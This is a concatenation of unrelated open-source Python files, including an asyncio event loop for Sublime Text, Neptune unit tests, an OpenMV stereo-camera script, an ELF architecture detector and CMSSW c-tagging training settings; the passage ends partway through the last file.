class SublimeEventLoop (asyncio.AbstractEventLoop):
def run_forever(self):
raise NotImplementedError
def run_until_complete(self, future):
raise NotImplementedError
def stop(self):
raise NotImplementedError
def is_running(self):
raise NotImplementedError
def is_closed(self):
raise NotImplementedError
def close(self):
raise NotImplementedError
def shutdown_asyncgens(self):
raise NotImplementedError
# Methods scheduling callbacks. All these return Handles.
def _timer_handle_cancelled(self, handle):
raise NotImplementedError
def call_soon(self, callback, *args, context=None):
handle = Handle(callback, args)
sublime.set_timeout(handle, 0)
return handle
def call_later(self, delay, callback, *args, context=None):
handle = Handle(callback, args)
sublime.set_timeout(handle, delay * 1000)
return handle
def call_at(self, when, callback, *args):
raise NotImplementedError
def time(self):
raise NotImplementedError
def create_future(self):
return asyncio.futures.Future(loop=self)
# Method scheduling a coroutine object: create a task.
def create_task(self, coro):
task = asyncio.tasks.Task(coro, loop=self)
if task._source_traceback: #type: ignore
del task._source_traceback[-1] #type: ignore
return task
# Methods for interacting with threads.
def call_soon_threadsafe(self, callback, *args):
return self.call_later(0, callback, *args)
def run_in_executor(self, executor, func, *args):
raise NotImplementedError
def set_default_executor(self, executor):
raise NotImplementedError
# Task factory.
def set_task_factory(self, factory):
raise NotImplementedError
def get_task_factory(self):
raise NotImplementedError
# Error handlers.
def get_exception_handler(self):
raise NotImplementedError
def set_exception_handler(self, handler):
raise NotImplementedError
def default_exception_handler(self, context):
raise NotImplementedError
def call_exception_handler(self, context):
from .log import log_exception
from .error import Error
try:
if 'exception' in context:
raise context['exception']
else:
raise Error(context['message'])
except Exception as e:
log_exception()
# Debug flag management.
def get_debug(self):
return False
def set_debug(self, enabled):
raise NotImplementedError
|
qiskit_nature/transformers/base_transformer.py | renier/qiskit-nature | 132 | 12686308 | <gh_stars>100-1000
# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""The Base Operator Transformer interface."""
from abc import ABC, abstractmethod
from typing import Any
class BaseTransformer(ABC):
"""**DEPRECATED!** The interface for implementing methods which map from one `QMolecule` or
'WatsonHamiltonian' to another. These methods may or may not affect the size of the Hilbert
space.
"""
@abstractmethod
def transform(self, molecule_data: Any):
"""Transforms one `QMolecule` or 'WatsonHamiltonian' into another one. This may or may
not affect the size of the Hilbert space.
Args:
molecule_data: the `QMolecule` or 'WatsonHamiltonian' to be transformed.
Returns:
A new `QMolecule` or 'WatsonHamiltonian' instance.
"""
raise NotImplementedError()
|
src/twisted/internet/iocpreactor/iocpsupport.py | giadram/twisted | 4,612 | 12686316 | <filename>src/twisted/internet/iocpreactor/iocpsupport.py
__all__ = [
"CompletionPort",
"Event",
"accept",
"connect",
"get_accept_addrs",
"have_connectex",
"makesockaddr",
"maxAddrLen",
"recv",
"recvfrom",
"send",
]
from twisted_iocpsupport.iocpsupport import ( # type: ignore[import]
CompletionPort,
Event,
accept,
connect,
get_accept_addrs,
have_connectex,
makesockaddr,
maxAddrLen,
recv,
recvfrom,
send,
)
|
tests/neptune/new/internal/test_container_structure.py | Raalsky/neptune-client | 254 | 12686319 | #
# Copyright (c) 2020, Neptune Labs Sp. z o.o.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
import uuid
from neptune.new.exceptions import MetadataInconsistency
from neptune.new.internal.backends.neptune_backend_mock import NeptuneBackendMock
from neptune.new.internal.container_type import ContainerType
from neptune.new.internal.run_structure import ContainerStructure
from neptune.new.types.value import Value
class TestRunStructure(unittest.TestCase):
def test_get_none(self):
exp = ContainerStructure[int, dict]()
self.assertEqual(exp.get(["some", "path", "val"]), None)
def test_get_nested_variable_fails(self):
exp = ContainerStructure[int, dict]()
exp.set(["some", "path", "val"], 3)
with self.assertRaises(MetadataInconsistency):
exp.get(["some", "path", "val", "nested"])
with self.assertRaises(MetadataInconsistency):
exp.get(["some", "path", "val", "nested", "nested"])
def test_get_ns(self):
exp = ContainerStructure[int, dict]()
exp.set(["some", "path", "val"], 3)
self.assertEqual(exp.get(["some", "path"]), {"val": 3})
def test_set(self):
exp = ContainerStructure[int, dict]()
exp.set(["some", "path", "val"], 3)
self.assertEqual(exp.get(["some", "path", "val"]), 3)
def test_set_nested_variable_fails(self):
exp = ContainerStructure[int, dict]()
exp.set(["some", "path", "val"], 3)
with self.assertRaises(MetadataInconsistency):
exp.set(["some", "path", "val", "nested"], 3)
with self.assertRaises(MetadataInconsistency):
exp.set(["some", "path", "val", "nested", "nested"], 3)
def test_set_ns_collision(self):
exp = ContainerStructure[int, dict]()
exp.set(["some", "path", "val"], 3)
with self.assertRaises(MetadataInconsistency):
exp.set(["some", "path"], 5)
def test_pop(self):
exp = ContainerStructure[int, dict]()
exp.set(["some", "path", "val1"], 3)
exp.set(["some", "path", "val2"], 5)
exp.pop(["some", "path", "val2"])
self.assertEqual(exp.get(["some", "path", "val1"]), 3)
self.assertEqual(exp.get(["some", "path", "val2"]), None)
self.assertTrue(
"some" in exp.get_structure() and "path" in exp.get_structure()["some"]
)
def test_pop_whole_ns(self):
exp = ContainerStructure[int, dict]()
exp.set(["some", "path", "val"], 3)
exp.pop(["some", "path", "val"])
self.assertEqual(exp.get(["some", "path", "val"]), None)
self.assertFalse("some" in exp.get_structure())
def test_pop_not_found(self):
exp = ContainerStructure[int, dict]()
with self.assertRaises(MetadataInconsistency):
exp.pop(["some", "path"])
def test_pop_ns_fail(self):
exp = ContainerStructure[int, dict]()
exp.set(["some", "path", "val1"], 3)
with self.assertRaises(MetadataInconsistency):
exp.pop(["some", "path"])
class TestIterateSubpaths(unittest.TestCase):
# pylint: disable=protected-access
project_uuid = str(uuid.uuid4())
def setUp(self):
self.backend = NeptuneBackendMock()
exp = self.backend.create_run(self.project_uuid)
# FIXME test for projects
self.structure = self.backend._containers[(exp.id, ContainerType.RUN)]
self.structure.set(["attributes", "float"], Value())
self.structure.set(["attributes", "node", "one"], Value())
self.structure.set(["attributes", "node", "two"], Value())
self.structure.set(["attributes", "node", "three"], Value())
self.structure.set(["attributes", "int"], Value())
self.structure.set(["attributes", "string"], Value())
def test_iterate_empty_run(self):
empty_structure = ContainerStructure[Value, dict]()
self.assertListEqual(list(empty_structure.iterate_subpaths([])), [])
self.assertListEqual(list(empty_structure.iterate_subpaths(["test"])), [])
def test_iterate_empty_prefix(self):
prefix = []
expected_subpaths = [
"sys/id",
"sys/state",
"sys/owner",
"sys/size",
"sys/tags",
"sys/creation_time",
"sys/modification_time",
"sys/failed",
"attributes/float",
"attributes/int",
"attributes/string",
"attributes/node/one",
"attributes/node/two",
"attributes/node/three",
]
print(list(self.structure.iterate_subpaths(prefix)))
self.assertListEqual(
list(self.structure.iterate_subpaths(prefix)), expected_subpaths
)
def test_iterate_prefix(self):
prefix = ["sys"]
expected_subpaths = [
"sys/id",
"sys/state",
"sys/owner",
"sys/size",
"sys/tags",
"sys/creation_time",
"sys/modification_time",
"sys/failed",
]
self.assertListEqual(
list(self.structure.iterate_subpaths(prefix)), expected_subpaths
)
def test_iterate_long_prefix(self):
prefix = ["attributes", "node"]
expected_subpaths = [
"attributes/node/one",
"attributes/node/two",
"attributes/node/three",
]
self.assertListEqual(
list(self.structure.iterate_subpaths(prefix)), expected_subpaths
)
def test_iterate_nonexistent_prefix(self):
prefix = ["argh"]
expected_subpaths = []
self.assertListEqual(
list(self.structure.iterate_subpaths(prefix)), expected_subpaths
)
|
ProofOfConcepts/Vision/OpenMvStereoVision/src/target_code/stereo_remote_cam.py | WoodData/EndpointAI | 190 | 12686330 | import image, network, rpc, sensor, struct
import time
import micropython
from pyb import Pin
from pyb import LED
# variables that can be changed
save_to_SD = False
sensor_format = sensor.RGB565
#sensor_format = sensor.GRAYSCALE
# leds are used as an easy way to know if the remote camera has started fine
red_led = LED(1)
green_led = LED(2)
blue_led = LED(3)
ir_led = LED(4)
def led_control(x):
if (x&1)==0: red_led.off()
elif (x&1)==1: red_led.on()
if (x&2)==0: green_led.off()
elif (x&2)==2: green_led.on()
if (x&4)==0: blue_led.off()
elif (x&4)==4: blue_led.on()
if (x&8)==0: ir_led.off()
elif (x&8)==8: ir_led.on()
processing = True
# pin to trigger the snapshot
pin4 = Pin('P4', Pin.IN, Pin.PULL_UP)
# communication with the controller cam
interface = rpc.rpc_spi_slave(cs_pin="P3", clk_polarity=1, clk_phase=0)
# here we always choose the QVGA format (320x240) inside a VGA image
#if this is changed, the camera have to calibrated again
# also, the logic of mask_height should be checked
img_width = 320
img_height = 240
#additionnal data for the mask height
if sensor_format == sensor.RGB565:
mask_height = int(img_height /8)
else:
mask_height = int(img_height / 4)
sensor.reset()
sensor_size = sensor.VGA
sensor.set_pixformat(sensor_format)
sensor.set_framesize(sensor_size)
sensor.set_windowing((int((sensor.width()-img_width)/2),int((sensor.height()-img_height)/2),img_width,img_height))
# the following is not really needed, this is to do the same as the controller cam
sensor.skip_frames(time = 2000)
sensor.snapshot()
################################################################
# Call Backs
################################################################
def sensor_config(data):
global processing
gain_db, exposure_us, r_gain_db, g_gain_db, b_gain_db = struct.unpack("<fIfff", data)
sensor.set_auto_gain(False, gain_db)
sensor.set_auto_exposure(False, exposure_us)
sensor.set_auto_whitebal(False, (r_gain_db, g_gain_db, b_gain_db))
processing = False
return struct.pack("<fIfff",gain_db, exposure_us, r_gain_db, g_gain_db, b_gain_db)
def raw_image_read_cb():
global processing
interface.put_bytes(sensor.get_fb().bytearray(), 5000) # timeout
processing = False
def raw_image_read(data):
interface.schedule_callback(raw_image_read_cb)
return bytes()
def loop_callback():
global processing
if not processing:
raise Exception
# Register call backs.
interface.register_callback(raw_image_read)
interface.register_callback(sensor_config)
interface.setup_loop_callback(loop_callback)
# a simple visual way to know the slave cam has started properly
# 2 blue blinks
led_control(4)
time.sleep(500)
led_control(0)
time.sleep(500)
led_control(4)
time.sleep(500)
led_control(0)
# configuration step
try:
processing = True
interface.loop()
except:
pass
#stabilisation of the cam
sensor.skip_frames(time=2000)
# save the ref image used for the diff
#print("About to save background image...")
data_fb = sensor.alloc_extra_fb(img_width, img_height, sensor.RGB565)
ref_img = sensor.alloc_extra_fb(img_width, img_height, sensor_format)
img = sensor.snapshot()
img.remap(data_fb, right=True)
ref_img.replace(img)
#print("Saved background image - Now frame differencing!")
# now add an additionnal part that will convey the mask info
sensor.set_windowing((int((sensor.width()-img_width)/2),int((sensor.height()-img_height)/2),img_width,img_height+ mask_height))
# serve for ever
while True:
try:
processing = True
while not pin4.value():
pass
# get the image and undistort it
sent_image = sensor.snapshot()
sent_image.remap(data_fb, right=True)
# diff it with the ref image that has also been undistorted
sent_image.difference_special(ref_img, data_fb, 25, 40, 400, 2000)
interface.loop()
except:
pass
|
src/api-service/__app__/timer_daily/__init__.py | tonybaloney/onefuzz | 2,692 | 12686362 | <filename>src/api-service/__app__/timer_daily/__init__.py
#!/usr/bin/env python
#
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import logging
import azure.functions as func
from ..onefuzzlib.webhooks import WebhookMessageLog
from ..onefuzzlib.workers.scalesets import Scaleset
def main(mytimer: func.TimerRequest) -> None: # noqa: F841
scalesets = Scaleset.search()
for scaleset in scalesets:
logging.info("updating scaleset configs: %s", scaleset.scaleset_id)
scaleset.needs_config_update = True
scaleset.save()
expired_webhook_logs = WebhookMessageLog.search_expired()
for log_entry in expired_webhook_logs:
logging.info(
"stopping expired webhook message log: %s:%s",
log_entry.webhook_id,
log_entry.event_id,
)
log_entry.delete()
|
factory-ai-vision/EdgeSolution/modules/InferenceModule/shared_memory.py | kaka-lin/azure-intelligent-edge-patterns | 176 | 12686370 | import tempfile
import mmap
import os
import logging
from exception_handler import PrintGetExceptionDetails
# ***********************************************************************************
# Shared memory management
#
class SharedMemoryManager:
def __init__(self, shmFlags=None, name=None, size=None):
try:
self._shmFilePath = '/dev/shm'
self._shmFileName = name
if self._shmFileName is None:
self._shmFileName = next(tempfile._get_candidate_names())
self._shmFileSize = size
if self._shmFileSize is None:
self._shmFileSize = 1024 * 1024 * 10 # Bytes (10MB)
self._shmFileFullPath = os.path.join(self._shmFilePath, self._shmFileName)
self._shmFlags = shmFlags
# See the NOTE section here: https://docs.python.org/2/library/os.html#os.open for details on shmFlags
if self._shmFlags is None:
self._shmFile = open(self._shmFileFullPath, 'r+b')
self._shm = mmap.mmap(self._shmFile.fileno(), self._shmFileSize)
else:
self._shmFile = os.open(self._shmFileFullPath, self._shmFlags)
os.ftruncate(self._shmFile, self._shmFileSize)
self._shm = mmap.mmap(self._shmFile, self._shmFileSize, mmap.MAP_SHARED, mmap.PROT_WRITE | mmap.PROT_READ)
# Dictionary to host reserved mem blocks
# self._mem_slots[sequenceNo] = [Begin, End] (closed interval)
self._memSlots = dict()
logging.info('Shared memory name: {0}'.format(self._shmFileFullPath))
except:
PrintGetExceptionDetails()
raise
def ReadBytes(self, memorySlotOffset, memorySlotLength):
try:
# This is Non-Zero Copy operation
# self._shm.seek(memorySlotOffset, os.SEEK_SET)
# bytesRead = self._shm.read(memorySlotLength)
# return bytesRead
#Zero-copy version
return memoryview(self._shm)[memorySlotOffset:memorySlotOffset+memorySlotLength].toreadonly()
except:
PrintGetExceptionDetails()
raise
# Returns None if no availability
# Returns closed interval [Begin, End] address with available slot
def GetEmptySlot(self, seqNo, sizeNeeded):
address = None
if sizeNeeded < 1:
return address
# Empty memory
if len(self._memSlots) < 1:
if self._shmFileSize >= sizeNeeded:
self._memSlots[seqNo] = (0, sizeNeeded - 1)
address = (0, sizeNeeded - 1)
else:
address = None
else:
self._memSlots = {k: v for k, v in sorted(
self._memSlots.items(), key=lambda item: item[1])}
# find an available memory gap = sizeNeeded
prevSlotEnd = 0
for k, v in self._memSlots.items():
if (v[0] - prevSlotEnd - 1) >= sizeNeeded:
address = (prevSlotEnd + 1, prevSlotEnd + sizeNeeded)
self._memSlots[seqNo] = (address[0], address[1])
break
else:
prevSlotEnd = v[1]
# no gap in between, check last possible gap
if address is None:
if (self._shmFileSize - prevSlotEnd + 1) >= sizeNeeded:
address = (prevSlotEnd + 1, prevSlotEnd + sizeNeeded)
self._memSlots[seqNo] = (address[0], address[1])
# interval [Begin, End]
return address
def DeleteSlot(self, seqNo):
try:
del self._memSlots[seqNo]
return True
except KeyError:
return False
def __del__(self):
try:
if self._shmFlags is None:
self._shmFile.close()
else:
os.close(self._shmFile)
except:
PrintGetExceptionDetails()
raise
|
lisa/core/architecture.py | jrespeto/LiSa | 244 | 12686383 | <gh_stars>100-1000
"""
ELF architecture detection module.
"""
import logging.config
from lisa.config import logging_config
logging.config.dictConfig(logging_config)
log = logging.getLogger()
e_machine = {
2: 'sparc',
3: 'i386',
4: 'm68k',
8: 'mips',
18: 'sparc32plus',
20: 'ppc',
21: 'ppc64',
22: 's390x',
40: 'arm',
41: 'alpha',
42: 'sh4',
43: 'sparc64',
62: 'x86_64',
183: 'aarch64'
}
def get_architecture(file_path):
"""Gets architecture and endianness information - needed
for starting guest machine and choosing proper image.
:param file_path: Path to file.
:returns: Tuple (arch, bit, endian)
"""
arch = None
bit = None
endian = None
with open(file_path, 'rb') as f:
header = f.read(32)
# check ELF header 7xELF
if header[:4] != b'\x7fELF':
log.critical('Analyzed file has invalid ELF header.')
return (None, None, None)
# 32 vs 64 bit
if header[4] == 1:
bit = '32'
elif header[4] == 2:
bit = '64'
# endianess
if header[5] == 1:
endian = 'little'
elif header[5] == 2:
endian = 'big'
# processor architecture
byte_arch = bytearray(header[18:20])
byte_arch_code = int.from_bytes(byte_arch, endian)
if byte_arch_code in e_machine:
arch = e_machine[byte_arch_code]
return (arch, bit, endian)
|
tests/datasets/test_combined_source_and_target.py | KevinMusgrave/pytorch-adapt | 131 | 12686396 | import unittest
import numpy as np
import torch
from pytorch_adapt.datasets import CombinedSourceAndTargetDataset
from pytorch_adapt.utils.common_functions import join_lists
class TestCombinedSourceAndTarget(unittest.TestCase):
def test_combined(self):
np.random.seed(3429)
for target_dataset_size in [99, 199]:
src_dataset_size = 117
src = torch.arange(src_dataset_size)
src = [{"src_imgs": i, "src_labels": i} for i in src]
tgt = torch.arange(target_dataset_size)
tgt = [{"target_imgs": i} for i in tgt]
d = CombinedSourceAndTargetDataset(src, tgt)
collected = []
num_loops = 10000
batch_size = 64
total_len = num_loops * batch_size
for x in range(num_loops):
collected.append([])
for i in range(batch_size):
batch = d[i]
collected[x].append(
(batch["src_imgs"].item(), batch["target_imgs"].item())
)
all_src = []
for c in collected:
self.assertTrue([x[1] for x in c] == list(range(batch_size)))
curr_src = [x[0] for x in c]
# check for randomness
self.assertTrue(curr_src not in all_src)
all_src.append(curr_src)
all_src = join_lists(all_src)
self.assertTrue(len(all_src) == total_len)
bincount = np.bincount(all_src)
self.assertTrue(len(bincount) == src_dataset_size)
ideal_bincount = total_len // src_dataset_size
self.assertTrue(
all(np.isclose(x, ideal_bincount, rtol=0.1) for x in bincount)
)
|
RecoBTag/CTagging/python/training_settings.py | ckamtsikis/cmssw | 852 | 12686398 | <reponame>ckamtsikis/cmssw
import FWCore.ParameterSet.Config as cms
## IMPORTANT!
## This file was automatically generated by RecoBTag/CTagging/test/dump_training_vars_cfg.py
## with input xml files:
## - C vs L: ../data/c_vs_udsg.weight.xml sha1 checksum: 1b50773894bf3c64e41694bd48bda5f6f0e3795b
## - C vs B: ../data/c_vs_b.weight.xml sha1 checksum: c342f54c6448d488e6e2b483a3a3956e34ad8ea1
c_vs_l_vars_vpset = cms.VPSet(cms.PSet(
default = cms.double(-1),
name = cms.string('vertexLeptonCategory'),
taggingVarName = cms.string('vertexLeptonCategory')
),
cms.PSet(
default = cms.double(-100),
idx = cms.int32(0),
name = cms.string('trackSip2dSig_0'),
taggingVarName = cms.string('trackSip2dSig')
),
cms.PSet(
default = cms.double(-100),
idx = cms.int32(1),
name = cms.string('trackSip2dSig_1'),
taggingVarName = cms.string('trackSip2dSig')
),
cms.PSet(
default = cms.double(-100),
idx = cms.int32(0),
name = cms.string('trackSip3dSig_0'),
taggingVarName = cms.string('trackSip3dSig')
),
cms.PSet(
default = cms.double(-100),
idx = cms.int32(1),
name = cms.string('trackSip3dSig_1'),
taggingVarName = cms.string('trackSip3dSig')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('trackPtRel_0'),
taggingVarName = cms.string('trackPtRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('trackPtRel_1'),
taggingVarName = cms.string('trackPtRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('trackPPar_0'),
taggingVarName = cms.string('trackPPar')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('trackPPar_1'),
taggingVarName = cms.string('trackPPar')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('trackEtaRel_0'),
taggingVarName = cms.string('trackEtaRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('trackEtaRel_1'),
taggingVarName = cms.string('trackEtaRel')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('trackDeltaR_0'),
taggingVarName = cms.string('trackDeltaR')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(1),
name = cms.string('trackDeltaR_1'),
taggingVarName = cms.string('trackDeltaR')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('trackPtRatio_0'),
taggingVarName = cms.string('trackPtRatio')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(1),
name = cms.string('trackPtRatio_1'),
taggingVarName = cms.string('trackPtRatio')
),
cms.PSet(
default = cms.double(1.1),
idx = cms.int32(0),
name = cms.string('trackPParRatio_0'),
taggingVarName = cms.string('trackPParRatio')
),
cms.PSet(
default = cms.double(1.1),
idx = cms.int32(1),
name = cms.string('trackPParRatio_1'),
taggingVarName = cms.string('trackPParRatio')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('trackJetDist_0'),
taggingVarName = cms.string('trackJetDist')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(1),
name = cms.string('trackJetDist_1'),
taggingVarName = cms.string('trackJetDist')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('trackDecayLenVal_0'),
taggingVarName = cms.string('trackDecayLenVal')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(1),
name = cms.string('trackDecayLenVal_1'),
taggingVarName = cms.string('trackDecayLenVal')
),
cms.PSet(
default = cms.double(0),
name = cms.string('jetNSecondaryVertices'),
taggingVarName = cms.string('jetNSecondaryVertices')
),
cms.PSet(
default = cms.double(-0.1),
name = cms.string('jetNTracks'),
taggingVarName = cms.string('jetNTracks')
),
cms.PSet(
default = cms.double(-0.1),
name = cms.string('trackSumJetEtRatio'),
taggingVarName = cms.string('trackSumJetEtRatio')
),
cms.PSet(
default = cms.double(-0.1),
name = cms.string('trackSumJetDeltaR'),
taggingVarName = cms.string('trackSumJetDeltaR')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('vertexMass_0'),
taggingVarName = cms.string('vertexMass')
),
cms.PSet(
default = cms.double(-10),
idx = cms.int32(0),
name = cms.string('vertexEnergyRatio_0'),
taggingVarName = cms.string('vertexEnergyRatio')
),
cms.PSet(
default = cms.double(-999),
idx = cms.int32(0),
name = cms.string('trackSip2dSigAboveCharm_0'),
taggingVarName = cms.string('trackSip2dSigAboveCharm')
),
cms.PSet(
default = cms.double(-999),
idx = cms.int32(0),
name = cms.string('trackSip3dSigAboveCharm_0'),
taggingVarName = cms.string('trackSip3dSigAboveCharm')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('flightDistance2dSig_0'),
taggingVarName = cms.string('flightDistance2dSig')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('flightDistance3dSig_0'),
taggingVarName = cms.string('flightDistance3dSig')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('vertexJetDeltaR_0'),
taggingVarName = cms.string('vertexJetDeltaR')
),
cms.PSet(
default = cms.double(0),
idx = cms.int32(0),
name = cms.string('vertexNTracks_0'),
taggingVarName = cms.string('vertexNTracks')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('massVertexEnergyFraction_0'),
taggingVarName = cms.string('massVertexEnergyFraction')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('vertexBoostOverSqrtJetPt_0'),
taggingVarName = cms.string('vertexBoostOverSqrtJetPt')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('leptonPtRel_0'),
taggingVarName = cms.string('leptonPtRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('leptonPtRel_1'),
taggingVarName = cms.string('leptonPtRel')
),
cms.PSet(
default = cms.double(-10000),
idx = cms.int32(0),
name = cms.string('leptonSip3d_0'),
taggingVarName = cms.string('leptonSip3d')
),
cms.PSet(
default = cms.double(-10000),
idx = cms.int32(1),
name = cms.string('leptonSip3d_1'),
taggingVarName = cms.string('leptonSip3d')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('leptonDeltaR_0'),
taggingVarName = cms.string('leptonDeltaR')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('leptonDeltaR_1'),
taggingVarName = cms.string('leptonDeltaR')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('leptonRatioRel_0'),
taggingVarName = cms.string('leptonRatioRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('leptonRatioRel_1'),
taggingVarName = cms.string('leptonRatioRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('leptonEtaRel_0'),
taggingVarName = cms.string('leptonEtaRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('leptonEtaRel_1'),
taggingVarName = cms.string('leptonEtaRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('leptonRatio_0'),
taggingVarName = cms.string('leptonRatio')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('leptonRatio_1'),
taggingVarName = cms.string('leptonRatio')
))
c_vs_b_vars_vpset = cms.VPSet(cms.PSet(
default = cms.double(-1),
name = cms.string('vertexLeptonCategory'),
taggingVarName = cms.string('vertexLeptonCategory')
),
cms.PSet(
default = cms.double(-100),
idx = cms.int32(0),
name = cms.string('trackSip2dSig_0'),
taggingVarName = cms.string('trackSip2dSig')
),
cms.PSet(
default = cms.double(-100),
idx = cms.int32(1),
name = cms.string('trackSip2dSig_1'),
taggingVarName = cms.string('trackSip2dSig')
),
cms.PSet(
default = cms.double(-100),
idx = cms.int32(0),
name = cms.string('trackSip3dSig_0'),
taggingVarName = cms.string('trackSip3dSig')
),
cms.PSet(
default = cms.double(-100),
idx = cms.int32(1),
name = cms.string('trackSip3dSig_1'),
taggingVarName = cms.string('trackSip3dSig')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('trackPtRel_0'),
taggingVarName = cms.string('trackPtRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('trackPtRel_1'),
taggingVarName = cms.string('trackPtRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('trackPPar_0'),
taggingVarName = cms.string('trackPPar')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('trackPPar_1'),
taggingVarName = cms.string('trackPPar')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('trackEtaRel_0'),
taggingVarName = cms.string('trackEtaRel')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(1),
name = cms.string('trackEtaRel_1'),
taggingVarName = cms.string('trackEtaRel')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('trackDeltaR_0'),
taggingVarName = cms.string('trackDeltaR')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(1),
name = cms.string('trackDeltaR_1'),
taggingVarName = cms.string('trackDeltaR')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('trackPtRatio_0'),
taggingVarName = cms.string('trackPtRatio')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(1),
name = cms.string('trackPtRatio_1'),
taggingVarName = cms.string('trackPtRatio')
),
cms.PSet(
default = cms.double(1.1),
idx = cms.int32(0),
name = cms.string('trackPParRatio_0'),
taggingVarName = cms.string('trackPParRatio')
),
cms.PSet(
default = cms.double(1.1),
idx = cms.int32(1),
name = cms.string('trackPParRatio_1'),
taggingVarName = cms.string('trackPParRatio')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('trackJetDist_0'),
taggingVarName = cms.string('trackJetDist')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(1),
name = cms.string('trackJetDist_1'),
taggingVarName = cms.string('trackJetDist')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('trackDecayLenVal_0'),
taggingVarName = cms.string('trackDecayLenVal')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(1),
name = cms.string('trackDecayLenVal_1'),
taggingVarName = cms.string('trackDecayLenVal')
),
cms.PSet(
default = cms.double(0),
name = cms.string('jetNSecondaryVertices'),
taggingVarName = cms.string('jetNSecondaryVertices')
),
cms.PSet(
default = cms.double(-0.1),
name = cms.string('jetNTracks'),
taggingVarName = cms.string('jetNTracks')
),
cms.PSet(
default = cms.double(-0.1),
name = cms.string('trackSumJetEtRatio'),
taggingVarName = cms.string('trackSumJetEtRatio')
),
cms.PSet(
default = cms.double(-0.1),
name = cms.string('trackSumJetDeltaR'),
taggingVarName = cms.string('trackSumJetDeltaR')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('vertexMass_0'),
taggingVarName = cms.string('vertexMass')
),
cms.PSet(
default = cms.double(-10),
idx = cms.int32(0),
name = cms.string('vertexEnergyRatio_0'),
taggingVarName = cms.string('vertexEnergyRatio')
),
cms.PSet(
default = cms.double(-999),
idx = cms.int32(0),
name = cms.string('trackSip2dSigAboveCharm_0'),
taggingVarName = cms.string('trackSip2dSigAboveCharm')
),
cms.PSet(
default = cms.double(-999),
idx = cms.int32(0),
name = cms.string('trackSip3dSigAboveCharm_0'),
taggingVarName = cms.string('trackSip3dSigAboveCharm')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('flightDistance2dSig_0'),
taggingVarName = cms.string('flightDistance2dSig')
),
cms.PSet(
default = cms.double(-1),
idx = cms.int32(0),
name = cms.string('flightDistance3dSig_0'),
taggingVarName = cms.string('flightDistance3dSig')
),
cms.PSet(
default = cms.double(-0.1),
idx = cms.int32(0),
name = cms.string('vertexJetDeltaR_0'),
taggingVarName = cms.string('vertexJetDeltaR')
),
cms.PSet(
default = cms.double(0),
idx = cms.int32(0),
name = cms.string('vertexNTracks_0'),
